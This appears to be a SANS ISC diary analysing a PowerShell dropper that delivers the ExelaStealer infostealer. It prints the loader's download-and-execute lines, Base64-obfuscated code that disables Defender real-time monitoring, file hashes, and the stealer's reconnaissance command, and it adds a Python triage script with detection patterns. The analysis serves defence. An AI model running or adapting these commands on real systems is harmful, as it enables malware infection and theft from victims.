ExelaStealer Delivered "From Russia With Love"

Published: 2024-07-26. Last Updated: 2024-07-26 11:51:44 UTC
by Xavier Mertens (Version: 1)

Some simple PowerShell scripts might deliver nasty content if executed by the target. I found a very simple one (with a low VT score of 8/65):

$webclient = New-Object System.Net.WebClient
$webclient.Headers.Add("X-Requested-With", "PowerShell")
$script = $webclient.DownloadString("hxxp://147[.]45[.]159[.]206/open.ps1")
Invoke-Expression $script

The file "open.ps1" is downloaded from Russia and contains comments in Russian like "Function of real-life security protection". It will try to disable the antivirus or, if not possible, it will ask the victim to do it!

# Decoded: "Press d when u turn off Tamper Protect!"
$ready = Read-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("UHJlc3MgZCB3aGVuIHUgdHVybiBvZmYgVGFtcGVyIFByb3RlY3Qh")))

if ($ready -eq "d") {
    Try {
        Set-MpPreference -DisableRealtimeMonitoring $true
        Write-Host "1"
    }
    Catch {
        Write-Host "2"
    }
}
else {
    # Decoded: "Canceled!"
    Write-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q2FuY2VsZWQh")))
    exit
}
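
The Base64 decoding noted in the comments above can be automated when triaging similar scripts. The following Python is an added example, not part of the original diary: it decodes FromBase64String literals and then matches three behaviours described here. The rule names and the SAMPLE text are constructed for illustration.

```python
import base64
import binascii
import re

# Constructed sample: the prompt/tamper logic from open.ps1 as shown above.
SAMPLE = r'''
$ready = Read-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("UHJlc3MgZCB3aGVuIHUgdHVybiBvZmYgVGFtcGVyIFByb3RlY3Qh")))
if ($ready -eq "d") { Set-MpPreference -DisableRealtimeMonitoring $true }
else { Write-Host ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q2FuY2VsZWQh"))) }
'''

B64_CALL = re.compile(r'FromBase64String\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)', re.I)

# Behaviours described in this diary; the rule names are hypothetical labels.
RULES = {
    "defender_realtime_disabled": re.compile(
        r'Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b', re.I),
    "download_and_execute": re.compile(
        r'DownloadString\(.*?(Invoke-Expression|\bIEX\b)', re.I | re.S),
    "tamper_protection_prompt": re.compile(r'Tamper\s+Protect', re.I),
}

def decode_literals(script):
    """Return the text hidden in FromBase64String("...") literals."""
    out = []
    for m in B64_CALL.finditer(script):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid Base64: leave it for manual review
        # This script uses UTF-8; the UTF-16LE fallback is an assumption for other samples.
        enc = "utf-16-le" if raw[1:2] == b"\x00" else "utf-8"
        out.append(raw.decode(enc, errors="replace"))
    return out

def triage(script):
    """Return (sorted rule hits, decoded strings) for one script block."""
    decoded = decode_literals(script)
    # Match on the raw text plus the decoded strings, so encoded prompts are seen too.
    haystack = script + "\n" + "\n".join(decoded)
    hits = sorted(name for name, rx in RULES.items() if rx.search(haystack))
    return hits, decoded

if __name__ == "__main__":
    hits, strings = triage(SAMPLE)
    print("rules:", hits)
    for s in strings:
        print("decoded:", s)
```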

Then, the script tries to download two PE files:

  • cmd.exe (SHA256: 97d6e2d922c2f69cb84341b238966555820f0b46375a9e0e1a1a19a5f42a8f96)
  • service.exe (SHA256: de223760fd87d21d3548ab96e810f7c0c16aeea156905845d2e3c81e1e7df663)

"cmd.exe" is a self-extracting RAR archive:

remnux@remnux:MalwareZoo/20240726$ rar t cmd.exe 

RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Testing archive cmd.exe

Testing     comCommon.exe                                             OK 
Testing     OejMizBn6qpQO.vbe                                         OK 
Testing     e0FFDTJuwoKvrdf9FE4ACLcGB7vDN5I0giWGmO2aDyI3QEuN.bat      OK 
All OK

It communicates with solararbx[.]online (37.140.192.207). At this time, I'm not sure about the purpose of the RAR archive.

"service.exe" is the Exela[1] stealer, developed in Python and compiled into a PE file. It uses Discord as a C2 channel. Reconnaissance is performed via a simple script:

C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

[1] https://github.com/quicaxd/Exela-V2.0

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant